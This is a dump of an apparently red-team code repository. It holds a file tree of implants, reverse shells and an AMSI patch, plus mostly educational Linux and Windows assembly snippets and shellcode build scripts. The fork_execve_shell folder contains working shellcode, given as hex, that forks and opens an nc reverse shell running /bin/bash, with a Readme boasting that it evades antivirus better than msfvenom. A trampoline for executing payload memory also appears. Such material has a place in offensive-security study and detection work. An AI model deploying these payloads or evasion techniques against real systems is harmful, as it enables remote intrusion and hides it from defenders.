│ │ ├── reverse.dll
│ │ ├── reverseDLL.bin
│ │ └── reverseDLL.cpp
│ │ ├── reverseEXE.bin
│ │ └── reverseEXE.txt
├── message_box
│ ├── Readme.md
│ ├── message_box.cpp
│ └── message_box.exe
├── recursion_off_the_disk
│ ├── ROTD
│ │ ├── ROTD.exe
│ │ ├── ROTD.pdb
│ │ ├── ROTD_orig.exe
│ │ ├── compile.bat
│ │ ├── favicon.ico
│ │ ├── resources.h
│ │ ├── resources.o
│ │ ├── resources.rc
│ │ ├── resources.res
│ │ ├── reverse_shell.bin
│ │ ├── rotd.cpp
│ │ ├── rotd.obj
│ │ └── xorencrypt.py
│ ├── Readme.md
│ └── reverse_shell
│ │ ├── compile.bat
│ │ ├── reverse_shell.cpp
│ │ ├── reverse_shell.exe
│ │ └── reverse_shell.obj
├── rsrc_injection
│ ├── Readme.md
│ ├── compile.bat
│ ├── favicon.ico
│ ├── implant.cpp
│ ├── implant.exe
│ ├── implant.obj
│ ├── msgbox64.bin
│ ├── resources.h
│ ├── resources.o
│ ├── resources.rc
│ ├── resources.res
│ └── xorencrypt.py
└── rsrc_injection_shell
│ ├── Readme.md
│ ├── compile.bat
│ ├── favicon.ico
│ ├── implant.cpp
│ ├── implant.exe
│ ├── implant.obj
│ ├── implant_noemul.exe
│ ├── resources.h
│ ├── resources.o
│ ├── resources.rc
│ ├── resources.res
│ ├── reverse_shell
│ ├── compile.bat
│ ├── reverse_shell.cpp
│ ├── reverse_shell.exe
│ ├── reverse_shell.obj
│ └── shell.bin
│ ├── shell.bin
│ └── xorencrypt.py
├── LICENSE.md
├── Powershell
├── Readme.md
└── amsi-patch.ps1
├── Presentations
├── .placeholder
└── Building Skynet_as_submitted.pptx
├── Python
├── PushingP
│ ├── pushingpayloads.py
│ └── pushingpayloadsv3.py
├── Readme.md
├── smuggler
│ ├── OUT
│ │ └── test.txt
│ ├── Readme.md
│ ├── in.txt
│ ├── out.txt
│ ├── smuggler.py
│ └── test.txt
└── utilities
│ ├── Readme.md
│ ├── aesencrypt.py
│ ├── beautify.py
│ └── xorencrypt.py
├── Readme.md
└── Rust
├── CreateProcessA
├── Cargo.toml
├── Readme.md
└── main.rs
├── Readme.md
├── peruns_fart
├── Cargo.toml
├── Readme.md
└── main.rs
├── rust_implantv1
├── implant_rust.exe
└── main.rs
├── rust_implantv2
├── Cargo.toml
├── Readme.md
├── main.rs
└── rusty_implant.exe
├── rust_implantv3
├── Cargo.toml
├── Readme.md
├── main.rs
└── rusty_implantv3.exe
├── rust_implantv4
├── Cargo.toml
├── Readme.md
├── main.rs
└── rusty_implantv4.exe
└── rusty_calc
├── Cargo.toml
├── Readme.md
├── main-original.rs
└── main.rs
/Assembly/Linx86-64/Readme.md:
--------------------------------------------------------------------------------
1 | Assembly programs and executables for Linux (x86_64)
2 |
3 | Developed on Kali Linux
4 |
5 | nasm -f elf64 -o PROGRAM_NAME.o PROGRAM_NAME.asm -l PROGRAM_NAME.assembly
6 |
7 | ld -g PROGRAM_NAME.o -o PROGRAM_NAME.bin
8 |
9 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/call_program/call_me:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/call_program/call_me
--------------------------------------------------------------------------------
/Assembly/Linx86-64/call_program/call_me.asm:
--------------------------------------------------------------------------------
1 | global _start
2 | section .rodata
3 | msg: db "Hello, world!", 10 ; not referenced by the code visible in this file
4 | msglen: equ $ - msg ; length of msg; also unreferenced below
5 | a: db 10 ; a..j are one-byte constants, each holding 10; only a-d are read below
6 | b: db 10
7 | c: db 10
8 | d: db 10
9 | e: db 10
10 | f: db 10
11 | g: db 10
12 | h: db 10
13 | i: db 10
14 | j: db 10
15 |
16 | section .text
17 | ; Control moves between _start, _step and _step_2 through hand-pushed addresses and ret; no call instruction is used.
18 | _start:
19 | push _start+0x7 ; hand-made return address; presumably the `mov rax, 0` below (5-byte push + 2-byte short jmp) - confirm in call_me.assembly
20 | jmp _step ; plain jump, so nothing is pushed automatically
21 | mov rax, 0 ; presumably where the final ret of _step_2 resumes
22 |
23 | mov rax, 60 ; rax = 60, the exit syscall number
24 | mov rdi, 0 ; rdi = exit status 0
25 | syscall ; exit(0)
26 |
27 | _step:
28 | push _step_2 ; the ret at the end of this routine pops this address
29 | mov al, [a] ; byte loads write only the low 8 bits; the upper bits of rax..rdx keep their previous values
30 | mov bl, [b]
31 | mov cl, [c]
32 | mov dl, [d]
33 | ret ; pops the _step_2 address pushed above and continues there
34 |
35 | _step_2:
36 | push rax ; saved copy of rax; discarded by the add rsp below, never popped
37 | add rax, rbx ; the adds use the full 64-bit registers, not just the bytes loaded in _step
38 | add rax, rcx
39 | add rax, rdx
40 | mov rbx, rax ; copy the sum into rbx
41 | add rsp, 0x8 ; drop the saved rax so the next stack slot is the address pushed at _start
42 | ret ; pops that address (_start+0x7) and resumes there
43 |
44 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/call_program/call_me.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/call_program/call_me.o
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/Readme.md:
--------------------------------------------------------------------------------
1 | A more performant way of generating custom shellcode. Rather than clunky manual stack manipulation, we leverage NASM's ability to generate
2 | relative addresses to produce injectable shellcode.
3 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/beautify.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | """Print the hex text in ./dump.txt as a C `unsigned char cmd[]` string literal."""
3 |
4 | __author__ = "0xTriboulet"
5 |
6 | # Input shape assumed by the slicing below: every line is an even-length run of
7 | # hex digits followed by a newline, like the dump.txt stored next to this script.
8 | with open("dump.txt") as dump:
9 |     rows = dump.readlines()
10 |
11 | # An empty dump.txt raises IndexError here, before anything is printed.
12 | final_row = rows[-1]
13 | print("unsigned char cmd[] = ")
14 | for row in rows:
15 |     # len(row) - 1 leaves out the trailing newline; each digit pair becomes one \xNN escape.
16 |     escaped = "".join("\\x" + row[pos:pos + 2] for pos in range(0, len(row) - 1, 2))
17 |     # Identity comparison: only the list's last element closes the C statement with ';'.
18 |     closing = '";' if row is final_row else '"'
19 |     print('"' + escaped + closing)
20 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/call_me:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/call_me
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/call_me.asm:
--------------------------------------------------------------------------------
1 | DEFAULT REL ; memory operands are RIP-relative unless stated otherwise
2 | ; Builds argv = { arg0, arg1, NULL } on the stack and calls execve(arg0, argv, NULL); exits if execve returns.
3 | ; nasm -f elf64 -o call_me.o call_me.asm -l call_me.assembly -O0
4 | ; ld -m elf_x86_64 -o call_me call_me.o
5 |
6 | global _start
7 |
8 | section .text
9 |
10 | _start:
11 |
12 | mov rbp, rsp ; remember the incoming stack pointer
13 | sub rsp, 0x48 ; reserve 0x48 bytes below it
14 |
15 | mov rax, 59 ; syscall number 59 = execve
16 |
17 | xor rcx, rcx ; rcx = 0 (zeroes the register, not the stack)
18 | push rcx ; NULL pointer that terminates argv
19 |
20 | lea rcx, [rel arg1] ; address of the argument string
21 | push rcx ; argv[1]
22 |
23 | lea rcx, [rel arg0] ; address of the command path
24 | push rcx ; argv[0]
25 |
26 | lea rdi, [rel arg0] ; rdi = path of the program to execute
27 | lea rsi, [rsp] ; rsi = argv, the three pointers just pushed
28 | xor rdx, rdx ; rdx = envp = NULL, i.e. no environment is passed
29 | syscall ; execve(arg0, argv, NULL); does not return on success
30 | ; Reached only if execve returned, i.e. failed.
31 | xor rdi, rdi ; exit status 0; NOTE(review): a failed execve is therefore reported as success
32 | mov rax, 60 ; syscall number 60 = exit
33 | syscall
34 | ; The strings sit in .text right after the code and are addressed with `rel`, so no absolute address is encoded.
35 | arg0: db "/usr/bin/echo", 0 ; COMMAND GOES HERE (NUL-terminated path)
36 | arg1: db "PAYLOAD GOES HERE!", 10, 0, 0 ; ARGUMENTS GO HERE (text, newline, then two NUL bytes)
37 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/call_me.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/call_me.o
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/call_me.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/call_me.so
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/dump.txt:
--------------------------------------------------------------------------------
1 | 4889e54881ec4800000048b83b000000
2 | 000000004831c951488d0d3600000051
3 | 488d0d2000000051488d3d1800000048
4 | 8d34244831d20f054831ff48b83c0000
5 | 00000000000f052f7573722f62696e2f
6 | 6563686f005041594c4f414420474f45
7 | 532048455245210a0000
8 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/system.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/system.bin
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/system_O3.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/system_O3.bin
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve/Readme.md:
--------------------------------------------------------------------------------
1 | This exercise develops a payload that calls fork(), then executes our standard /usr/bin/echo payload within the child process.
2 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve/beautify.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | """Print the hex text in ./dump.txt as a C `unsigned char cmd[]` string literal."""
3 |
4 | __author__ = "0xTriboulet"
5 |
6 | # Input shape assumed by the slicing below: every line is an even-length run of
7 | # hex digits followed by a newline, like the dump.txt stored next to this script.
8 | with open("dump.txt") as dump:
9 |     rows = dump.readlines()
10 |
11 | # An empty dump.txt raises IndexError here, before anything is printed.
12 | final_row = rows[-1]
13 | print("unsigned char cmd[] = ")
14 | for row in rows:
15 |     # len(row) - 1 leaves out the trailing newline; each digit pair becomes one \xNN escape.
16 |     escaped = "".join("\\x" + row[pos:pos + 2] for pos in range(0, len(row) - 1, 2))
17 |     # Identity comparison: only the list's last element closes the C statement with ';'.
18 |     closing = '";' if row is final_row else '"'
19 |     print('"' + escaped + closing)
20 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve/call_me:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve/call_me
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve/call_me.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve/call_me.o
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve/dump.txt:
--------------------------------------------------------------------------------
1 | 4889e54881ec480000004831c95148b8
2 | 39000000000000000f05488d0d1e0000
3 | 00488d1d0c000000483d00000000480f
4 | 44cbffe14881c4480000004889ecc348
5 | b83b00000000000000488d0d27000000
6 | 51488d0d1100000051488d3d09000000
7 | 488d34244831d20f052f7573722f6269
8 | 6e2f6563686f005041594c4f41442047
9 | 4f45532048455245210a0000
10 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve/how-to:
--------------------------------------------------------------------------------
1 | nasm -f elf64 -o call_me.o call_me.asm -l call_me.assembly -O3
2 | ld -m elf_x86_64 -N -s -o call_me call_me.o
3 | hexdump ./call_me -v -e '16/1 "%02x" "\n"' -n 300 > dump.txt
4 | python beautify.py
5 | copy into payload section of system.c
6 | gcc -m64 -g system.c -o system.bin -O0
7 | ./system.bin
8 |
9 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve/system.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve/system.bin
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve/useful.txt:
--------------------------------------------------------------------------------
1 | hexdump -s 0x1139 ./payload.bin -v -e '16/1 "%02x" "\n"' -n 200
2 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve_shell/Readme.md:
--------------------------------------------------------------------------------
1 | This payload implements a fork followed by a nc reverse shell in the child process.
2 |
3 |
4 | 
5 |
6 |
7 | The value of this methodology becomes clear when we generate a standard msfvenom payload and upload it to VirusTotal.
8 | 
9 |
10 |
11 | 
12 |
13 |
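14 | We can compare this with the custom system.bin file that we've crafted, and here are the results! Keep in mind that a VirusTotal score reflects static scanning at the time of upload; the runtime behaviour (a forked child that executes nc) remains visible to process-level monitoring.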
15 | 
16 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve_shell/beautify.py:
--------------------------------------------------------------------------------
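#!/usr/bin/env python3
"""Format the hex dump in dump.txt as a C ``unsigned char cmd[]`` literal.

Every non-empty line of dump.txt must hold an even number of hexadecimal
digits. Each byte is written as a backslash-x escape, one C string literal
per input line, and the last literal is terminated with ``;``.

Exits with an error message if dump.txt holds no data or a line is not a
well-formed hex string, so malformed input never reaches the generated C
source.
"""

__author__ = "0xTriboulet"

import string
import sys

with open("dump.txt") as f:
    # Strip surrounding whitespace so a newline, carriage return or padding
    # can never end up inside an escape, and drop blank lines entirely.
    rows = [row for row in (raw.strip() for raw in f) if row]

if not rows:
    sys.exit("dump.txt contains no hex data")

# Validate everything before printing so a bad line never yields a
# half-written array.
for row in rows:
    if len(row) % 2 or any(ch not in string.hexdigits for ch in row):
        sys.exit("dump.txt: not an even-length hex string: %r" % row)

print("unsigned char cmd[] = ")
final = len(rows) - 1
for index, row in enumerate(rows):
    escaped = "".join("\\x" + row[pos:pos + 2] for pos in range(0, len(row), 2))
    # Only the last literal closes the C statement.
    print('"' + escaped + ('";' if index == final else '"'))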
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve_shell/call_me:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve_shell/call_me
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve_shell/call_me.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve_shell/call_me.o
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve_shell/dump.txt:
--------------------------------------------------------------------------------
1 | 4889e54881ec480000004831c9515151
2 | 5151595959595948b839000000000000
3 | 000f05488d0d13000000488d1d170000
4 | 00483d00000000480f44cbffe14881c4
5 | 480000004889ecc348b83b0000000000
6 | 0000488d0d5400000051488d0d420000
7 | 0051488d0d3000000051488d0d250000
8 | 0051488d0d1100000051488d3d090000
9 | 00488d34244831d20f052f7573722f62
10 | 696e2f6e63002d65002f62696e2f6261
11 | 7368003132372e302e302e3100393030
12 | 310000
13 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve_shell/how-to:
--------------------------------------------------------------------------------
1 | nasm -f elf64 -o call_me.o call_me.asm -l call_me.assembly -O3
2 | ld -m elf_x86_64 -N -s -o call_me call_me.o
3 | hexdump ./call_me -v -e '16/1 "%02x" "\n"' -n 300 > dump.txt
4 | python beautify.py
5 | copy into payload section of system.c
6 | gcc -m64 -g system.c -o system.bin -O0
7 | ./system.bin
8 |
9 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve_shell/system.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve_shell/system.bin
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve_shell/useful.txt:
--------------------------------------------------------------------------------
1 | hexdump -s 0x1139 ./payload.bin -v -e '16/1 "%02x" "\n"' -n 200
2 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/hello_world/hello:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/hello_world/hello
--------------------------------------------------------------------------------
/Assembly/Linx86-64/hello_world/hello.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/hello_world/hello.o
--------------------------------------------------------------------------------
/Assembly/Linx86-64/hello_world/hello_world.asm:
--------------------------------------------------------------------------------
; Minimal Linux x86-64 program: write a greeting to stdout, then exit(0).
; Uses the raw syscall interface (number in rax, arguments in rdi, rsi, rdx).

        global  _start

        section .rodata
greeting:       db      "Hello, world!", 10     ; text followed by a line feed
greeting_len:   equ     $ - greeting            ; byte count, fixed at assembly time

        section .text
_start:
        ; write(STDOUT_FILENO, greeting, greeting_len)
        mov     rdx, greeting_len
        mov     rsi, greeting
        mov     rdi, 1                          ; STDOUT_FILENO
        mov     rax, 1                          ; write
        syscall

        ; exit(EXIT_SUCCESS)
        mov     rdi, 0                          ; EXIT_SUCCESS
        mov     rax, 60                         ; exit
        syscall
--------------------------------------------------------------------------------
/Assembly/Linx86-64/print_args/print_args:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/print_args/print_args
--------------------------------------------------------------------------------
/Assembly/Linx86-64/print_args/print_args.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/print_args/print_args.o
--------------------------------------------------------------------------------
/Assembly/Linx86-64/push_ret/test:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/push_ret/test
--------------------------------------------------------------------------------
/Assembly/Linx86-64/push_ret/test.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/push_ret/test.bin
--------------------------------------------------------------------------------
/Assembly/Linx86-64/push_ret/test.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/push_ret/test.o
--------------------------------------------------------------------------------
/Assembly/Readme.md:
--------------------------------------------------------------------------------
1 | Assembly programs designed for educational purposes. Assembly is essential to understand for payload crafting, reverse engineering, and malware development.
2 |
--------------------------------------------------------------------------------
/Assembly/Winx32/Readme.md:
--------------------------------------------------------------------------------
1 | Win32 programs written in assembly.
2 |
3 | nasm -f win32 PROGRAM_NAME.asm -o PROGRAM_NAME.obj -l PROGRAM_NAME.assembly
4 |
5 | gcc PROGRAM_NAME.obj -o PROGRAM_NAME.exe
6 |
--------------------------------------------------------------------------------
/Assembly/Winx32/hellow.asm:
--------------------------------------------------------------------------------
; 32-bit Windows demo: prints two messages through printf. _main reaches the
; two helper routines without `call`, by pushing a hand-computed return
; address and jumping through a register.
global _main ; declare main() method
extern _printf ; link to external library
segment .data
message: db 'Hello world!', 0xA, 0 ; line feed, then NUL terminator for printf
message_2: db 'Hello again!!', 0xA, 0
section .text
_other_2: ; prints message_2, then returns to the address on top of the stack
    push message_2 ; single stack argument for printf
    call _printf
    pop edi ; remove the argument again (the value lands in edi)
    ret
_other: ; prints message, then returns to the address on top of the stack
    push message
    call _printf
    pop edi ; remove the argument again (the value lands in edi)
    ret
_main:
    push _main+0xc ; hand-made return address; presumably the second push below
                   ; (push imm32 + mov r32, imm32 + jmp r32 = 12 bytes) - confirm in the listing
    mov edi, _other
    jmp edi ; enter _other; its ret pops the address pushed above
    push _main+0x18 ; return address for the second jump; presumably the add below - confirm
    mov edi, _other_2
    jmp edi
    add esp, 4 ; NOTE(review): both helpers look stack-balanced, so esp already points at
               ; main's own return address here and this add would step over it - confirm
    ret
; compile with nasm -f win32 hellow.asm
; link with gcc hellow.obj -o hellow.exe
--------------------------------------------------------------------------------
/Assembly/Winx32/hellow.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx32/hellow.exe
--------------------------------------------------------------------------------
/Assembly/Winx32/hellow.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx32/hellow.obj
--------------------------------------------------------------------------------
/Assembly/Winx64/Readme.md:
--------------------------------------------------------------------------------
1 | Win64 programs written in assembly. I prefer to use link for this architecture in order to leverage Windows function calls more easily.
2 |
3 | nasm -f win64 hello.asm -o hello_new.obj -l hello_new.assembly
4 |
5 | link /entry:start /subsystem:console hello_new.obj kernel32.lib
6 |
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/hello-win.asm:
--------------------------------------------------------------------------------
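; Win64 console program: writes "Hello World!" with GetStdHandle/WriteFile
; and terminates through ExitProcess.
extern GetStdHandle
extern WriteFile
extern ExitProcess

section .rodata

msg db "Hello World!", 0x0d, 0x0a

msg_len equ $-msg
stdout_query equ -11            ; STD_OUTPUT_HANDLE
status equ 0                    ; process exit code

section .data

stdout dq 0                     ; the handle is stored with an 8-byte mov, so reserve a qword
bytesWritten dd 0               ; WriteFile reports the byte count through a DWORD

section .text

global start

start:
    ; Win64 calling convention: the caller provides 32 bytes of shadow space
    ; and keeps rsp 16-byte aligned at every call. 40 = 32 (shadow) + 8 (slot
    ; for WriteFile's fifth argument), which also fixes the alignment, since
    ; rsp is 8 off a 16-byte boundary on entry.
    sub rsp, 40

    mov rcx, stdout_query
    call GetStdHandle
    mov [rel stdout], rax

    mov rcx, [rel stdout]       ; hFile
    lea rdx, [rel msg]          ; lpBuffer
    mov r8, msg_len             ; nNumberOfBytesToWrite
    lea r9, [rel bytesWritten]  ; lpNumberOfBytesWritten
    mov qword [rsp+32], 0       ; lpOverlapped = NULL, first slot above the shadow space
    call WriteFile

    mov rcx, status
    call ExitProcess            ; does not return, so the stack is never unwound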
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/hello-win.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/hello-win.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/hello-win.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/hello-win.obj
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/hello64.asm:
--------------------------------------------------------------------------------
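; Win64 program that prints a greeting through the C runtime's printf.
extern printf

section .data
msg db 'Hello World!', 0        ; printf reads up to a NUL byte, so terminate the string
section .text
global main
main:
    push rbp
    mov rbp, rsp                ; frame pointer, so `leave` can restore rsp

    mov rcx, msg                ; first argument: format string
    sub rsp, 32                 ; shadow space required by the Win64 calling convention
    call printf
    add rsp, 32

    leave
    ret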
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/hello64.fas:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/hello64.fas
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/hello64.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/hello64.obj
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/make:
--------------------------------------------------------------------------------
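# Build hello64.exe from hello64.asm (NASM + gcc).
# Target names match the files each rule actually produces, so make can
# build the object when it is missing and can tell when outputs are stale.
hello64.exe: hello64.obj
	gcc -o hello64.exe -g hello64.obj

# nasm derives the output name from the source file: hello64.obj
hello64.obj: hello64.asm
	nasm -f win64 -F cv8 hello64.asm -l hello64.lst

# Old target name kept as an alias.
.PHONY: hello.exe
hello.exe: hello64.exe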
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/test.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/test.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/test64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/test64.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_2/hello.asm:
--------------------------------------------------------------------------------
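; Win64 console program: writes "Hello World!" with GetStdHandle/WriteFile
; and terminates through ExitProcess.
extern GetStdHandle
extern WriteFile
extern ExitProcess

section .rodata

msg db "Hello World!", 0x0d, 0x0a

msg_len equ $-msg
stdout_query equ -11            ; STD_OUTPUT_HANDLE
status equ 0                    ; process exit code

section .data

stdout dq 0                     ; the handle is stored with an 8-byte mov, so reserve a qword
bytesWritten dd 0               ; WriteFile reports the byte count through a DWORD

section .text

global start

start:
    ; Win64 calling convention: the caller provides 32 bytes of shadow space
    ; and keeps rsp 16-byte aligned at every call. 40 = 32 (shadow) + 8 (slot
    ; for WriteFile's fifth argument), which also fixes the alignment, since
    ; rsp is 8 off a 16-byte boundary on entry.
    sub rsp, 40

    mov rcx, stdout_query
    call GetStdHandle
    mov [rel stdout], rax

    mov rcx, [rel stdout]       ; hFile
    lea rdx, [rel msg]          ; lpBuffer
    mov r8, msg_len             ; nNumberOfBytesToWrite
    lea r9, [rel bytesWritten]  ; lpNumberOfBytesWritten
    mov qword [rsp+32], 0       ; lpOverlapped = NULL, first slot above the shadow space
    call WriteFile

    mov rcx, status
    call ExitProcess            ; does not return, so the stack is never unwound
;nasm -f win64 hello.asm -o hello_new.obj -l hello_new.assembly
;link /entry:start /subsystem:console hello_new.obj kernel32.lib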
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_2/hello.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_2/hello.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_2/hello_new.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_2/hello_new.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_2/hello_new.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_2/hello_new.obj
--------------------------------------------------------------------------------
/Assembly/Winx64/call_stack/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Assembly/Winx64/call_stack/main_clean.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/call_stack/main_clean.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/call_stack/ramp.asm:
--------------------------------------------------------------------------------
; Two exported trampolines (NASM, win64 object). onRamp transfers control to
; a caller-supplied address after rewriting the top of the stack; offRamp is
; where that code lands if it executes a plain ret.
section .text
default rel
bits 64

global onRamp
global offRamp

;nasm -f win64 ramp.asm -o ramp.o
onRamp: ; onRamp(exec_mem, return_address) where &exec_mem in rcx
    pop rax ; corrupt previous frame: discards the return address left by the caller's call
    push rdx ; second argument (return_address) is pushed in its place
    lea rax, [offRamp] ; get offRamp address
    push rax ; if payload returns, it'll return to our off ramp
    jmp rcx ; execute exec_mem

offRamp: ; slide back into normal execution (dangerous!)
    mov rax, [r13] ; get return_address
                   ; NOTE(review): r13 is never written in this file; presumably the
                   ; caller or the executed code leaves a pointer there - confirm
    jmp rax ; jump to return_address
    nop ; This works for the demonstration but depending on your implant/payload you'll need custom offRamps
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/1.popcalc/popcalc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/1.popcalc/popcalc.exe
--------------------------------------------------------------------------------
